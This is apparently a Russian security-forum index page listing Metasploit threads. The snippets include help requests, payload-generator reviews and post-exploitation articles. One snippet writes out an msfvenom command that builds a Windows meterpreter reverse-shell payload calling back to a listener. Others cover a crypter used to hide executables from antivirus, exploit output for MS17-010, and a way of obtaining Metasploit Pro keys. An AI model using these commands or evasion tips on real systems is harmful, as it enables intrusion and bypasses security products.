• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

metasploit

  1. Tayrus

    Как в metasploit указать много целей?

    Как указать в metasploit много целей? Список например.
  2. Vander

    Статья Deep Exploit - Metasploit на Arch Linux ARM. Работа с реальным сервером

    Приветствую всех, жителей и гостей форума, в одной из моих предыдущих статей, а именно тут. В предыдущей статье я показал, как установить и довольно успешно пользоваться замечательным инструментом Deep Exploit, он включает в себя машинное обучение, нейросеть TensorFlow и ну и кучу всего...
  3. ruda_dima

    Статья Получаем ключ к PRO версии Metasploit

    Это вторая моя статья, и в этой статье хотел бы поделиться способом добычи ключей для trial версии Metasploit PRO. Наверное всем известно, что команда разработчиков Rapid7 изменила свою политику выдачу ключей для ПРО версии своего продукта. На данный момент ключ мгновенно на почту могут...
  4. U

    Выбор нагрузки / payloads? В чем отличия?

    Привет моему любимому комьюнити! При создании rat-ника и другой нечисти, в конце следует выбрать метод "нагрузки". в Метасплоите имеются следующие: windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)...
  5. Vertigo

    Статья Terminator - генератор Payloads для Metasploit

    Добрый день,Уважаемые Форумчане,Друзья и те,кто следит за пульсом ИБ. Хочу порадовать форум сегодня новинкой,которая генерирует различные backdoor. Автора этого замечательного генератора зовут Mohamed Nour. Помогать мне сегодня будут сделать обзор дистрибутивы ArchStrike и BlackArch. Простите...
  6. S

    Установка криптора msfencode

    Всем привет. Столкнулся с проблемой ответ на который нигде не смог найти. Значит я вычитал про криптор который шифрует исполняемые файлы exe и называется он msfencode, а вот скачать и установить его я не знаю как. Подскажите где можно скачать msfencode и найти инструкцию по его установке?
  7. W

    Проблема Metasploit не может подключиться к базам!

    Всем привет! Ошибка : "Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host...
  8. E

    Проблема metasploit

    Всем привет! Помогайте,заманался уже... ) Использую хендлер,ловлю сессию,делаю выход и после начинаются траблы ( Порт вечно занят,освободить невозможно. Даже когда он вроде бы как свободен при конфигурировании выдаёт ошибку Handler failed to bind to 111.111.111.6:9999 [-] Handler failed to...
  9. trueflownature

    Проблема Metasploit: не прошел проверку подлинности (по паролю)

    Как решить? Failed to connect to the database: ВАЖНО: пользователь "msf" не прошёл проверку подлинности (по паролю) ВАЖНО: пользователь "msf" не прошёл проверку подлинности (по паролю)
  10. BadBlackHat

    Статья Шпаргалка MSF

    Всем добрый день. Наткнулся тут на неплохую шпаргалку по использованию metasploit. Новичкам может пригодится)
  11. E

    Проблема MS14-066

    Все привет! Довольно часто встречаю узявимость MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution. Что то не могу найти в метасплоите похожего модуля,да и в принципе везде только описание его действий,PoC нету. Есть у кого нибудь информация,как его эксплуатировать ? :)
  12. Rollly

    Статья Установка Ubuntu в связке с Metasploit [TERMUX]

    Доброго времени суток, обитатели Codeby. Думаю не у каждого есть возможность иметь при себе ноутбук с хакерским арсеналом или же NetHunter, но на помощь к нам приходит Termux. Не буду тянуть кота за хвост. Как вы поняли из названия темы сегодня мы установим Ubuntu в связке с Metasploit...
  13. linked3234

    "Адекватный" VPS для тестирования MSF

    Приветствую! Решил сюда написать, т.к. вроде тема соответствует разделу.. В общем я подыскиваю недорогой VPS на debian для тренировки с MSFConsole (что б сессия прилетала, думаю вы поняли).. Не подскажете кто шарит, что и где лучше взять?
  14. Tayrus

    Проблема ms17_010_psexec

    Обновился до 2018.1, решил тестануть ms17_010_psexec, пишет Started reverse TCP handler on 192.168.1.4:4444 192.168.1.2:445 - Target OS: Windows 8.1 Enterprise 9600 [-] 192.168.1.2:445 - Unable to find accessible named pipe! Exploit completed, but no session was created. Не патчена, антивиря...
  15. Marr

    Metasploit Penetration Testing Cookbook

    Добрый день! Если у кого есть скиньте, пожалуйста, ссылку на полный перевод Metasploit Penetration Testing Cookbook Спасибо!
  16. S

    Ошибка metasploit wmap

    Ошибку ниже я сначала словил под Arch. Потом попробовал запустить и под Kali последней версии. Но ничего не поменялось под обеими ОС одна и та же ошибка. msf5 > wmap_targets -t http://site.com [-] Error while running command wmap_targets: PG::InvalidTextRepresentation: ERROR: invalid input...
  17. Tayrus

    Metasploit raw

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 -f raw > sag При открытии \FC\E8\82\00\00\00`\89\E51\C0d\8BP0\8BR\8BR\8Br(\B7J&1\FF\AC<a|, \C1\CF\C7\E2\F2RW\8BR\8BJ<\8BLx\E3H\D1Q\8BY...
  18. FlowLight

    Empire powershell и ngrok ! Кто-нибудь использует эту связку?

    Друзья , прошу помощи ! Не получается схватить агента с целевого пк , который находится за NATом. Слушатель Empire использует http-захват , а это поставило меня в тупик. Привык работать с TCP-ревёрсингом в метасплоит , использую NGROK для проброса портов. А вот в Empire не хватает тямы всё...
  19. BadBlackHat

    Пост эксплуатация скомпроментированных Windows систем. Metasploit Incognito

    Всем посетителям форума, доброго времени дня. Сегодня я решил осветить один из встроенных модулей в metasploit framework, о котором мало кто знает и мало кто пользуется, но на самом деле данный модуль позволяет поднять свои привилегии вплоть до администратора домена или предприятия в зависимости...
  20. FlowLight

    Эксплоиты на С++

    Друзья! Скажите пожалуйста , каким образом можно использовать эксплоиты с данным раширением в Metasploit и в какой среде ,помимо метасплоит , можно их юзать?